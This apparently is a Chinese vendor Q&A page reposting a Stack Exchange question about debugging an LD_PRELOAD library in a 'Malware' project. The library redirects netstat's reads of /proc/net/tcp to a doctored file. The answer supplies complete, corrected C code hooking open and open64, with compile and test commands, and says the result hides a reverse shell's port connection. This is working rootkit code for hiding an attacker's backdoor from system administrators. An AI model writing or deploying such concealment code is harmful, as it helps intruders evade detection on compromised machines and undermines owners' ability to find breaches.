You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

基于LD_PRELOAD重写open函数实现端口隐藏失效排查

解决LD_PRELOAD重写open无法隐藏netstat端口的问题

问题描述

已通过LD_PRELOAD重写readdir实现进程隐藏,现在尝试重写open函数,让netstat读取预先处理好的不含目标端口的文件/home/kali/Malware/project/hide_port/tcp,而非系统的/proc/net/tcp。编译生成libnetstat_hide.so后,执行LD_PRELOAD=./libnetstat_hide.so netstat仍能看到目标连接,需要排查并解决该问题。

原代码如下:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
    
static int (*original_open)(const char *pathname, int flags, ...) = NULL;
static int redirected_fd = -1;
    
int open(const char *pathname, int flags, ...) {
    // Load the original open function if not loaded
    if (!original_open) {
        original_open = dlsym(RTLD_NEXT, "open");
        if (!original_open) {
            fprintf(stderr, "Error: Unable to load original open function\n");
            return -1;
        }
    }
    
    // Check if the file being opened is /proc/net/tcp
    if (strcmp(pathname, "/proc/net/tcp") == 0) {
        // If not already redirected, open the new file
        if (redirected_fd == -1) {
            redirected_fd = original_open("/home/kali/Malware/project/hide_port/tcp", O_RDONLY);
            if (redirected_fd == -1) {
                fprintf(stderr, "Error: Unable to open /home/kali/Malware/project/hide_port/tcp\n");
                return -1;
            }
        }
    
        // Return the redirected file descriptor
        return redirected_fd;
    } else {
        // Call the original open function for other files
        return original_open(pathname, flags);
    }
}

编译命令:

gcc -shared -fPIC -o libnetstat_hide.so hide_sshd.c -ldl

问题分析

原代码存在三个关键问题:

  • 静态文件描述符复用错误:redirected_fd是静态变量,第一次打开替代文件后,后续所有open调用都返回同一个fd。当netstat关闭该fd后,此fd变为无效,后续调用会返回已关闭的fd,导致netstat回退读取原始/proc/net/tcp。
  • 可变参数处理缺失:open函数有两种原型(带或不带mode参数),原代码直接忽略可变参数,调用原始open时可能传递错误参数,导致调用失败。
  • 未兼容64位open函数:多数现代程序(包括netstat)会使用open64而非open来支持大文件,原代码未hook该函数,导致netstat绕过hook直接读取原始文件。

修复方案

针对上述问题,修改代码如下:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdarg.h>

// 定义原始函数指针
static int (*original_open)(const char *pathname, int flags, ...) = NULL;
static int (*original_open64)(const char *pathname, int flags, ...) = NULL;

// 处理open函数的通用逻辑
static int handle_open(const char *pathname, int flags, va_list ap) {
    // 检查是否需要重定向到自定义tcp文件
    if (strcmp(pathname, "/proc/net/tcp") == 0) {
        // 每次打开都重新打开自定义文件,避免fd复用问题
        return original_open("/home/kali/Malware/project/hide_port/tcp", O_RDONLY);
    }
    // 处理原始open的可变参数
    if (flags & O_CREAT) {
        mode_t mode = va_arg(ap, mode_t);
        return original_open(pathname, flags, mode);
    } else {
        return original_open(pathname, flags);
    }
}

// Hook open函数
int open(const char *pathname, int flags, ...) {
    if (!original_open) {
        original_open = dlsym(RTLD_NEXT, "open");
        if (!original_open) {
            fprintf(stderr, "Failed to load original open: %s\n", dlerror());
            return -1;
        }
    }
    va_list ap;
    va_start(ap, flags);
    int ret = handle_open(pathname, flags, ap);
    va_end(ap);
    return ret;
}

// Hook open64函数
int open64(const char *pathname, int flags, ...) {
    if (!original_open64) {
        original_open64 = dlsym(RTLD_NEXT, "open64");
        if (!original_open64) {
            fprintf(stderr, "Failed to load original open64: %s\n", dlerror());
            return -1;
        }
    }
    // 对于open64,同样重定向到自定义tcp文件
    if (strcmp(pathname, "/proc/net/tcp") == 0) {
        return original_open64("/home/kali/Malware/project/hide_port/tcp", O_RDONLY);
    }
    // 处理可变参数
    va_list ap;
    va_start(ap, flags);
    int ret;
    if (flags & O_CREAT) {
        mode_t mode = va_arg(ap, mode_t);
        ret = original_open64(pathname, flags, mode);
    } else {
        ret = original_open64(pathname, flags);
    }
    va_end(ap);
    return ret;
}

编译命令

gcc -shared -fPIC -o libnetstat_hide.so hide_sshd.c -ldl

验证步骤

  1. 确保/home/kali/Malware/project/hide_port/tcp文件已正确生成,且确实不含目标端口的行。
  2. 执行以下命令测试:
LD_PRELOAD=./libnetstat_hide.so netstat -antp

此时应看不到目标反向Shell的端口连接。


内容的提问来源于stack exchange,提问作者Andreas Frangos

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.07.05 23:00:04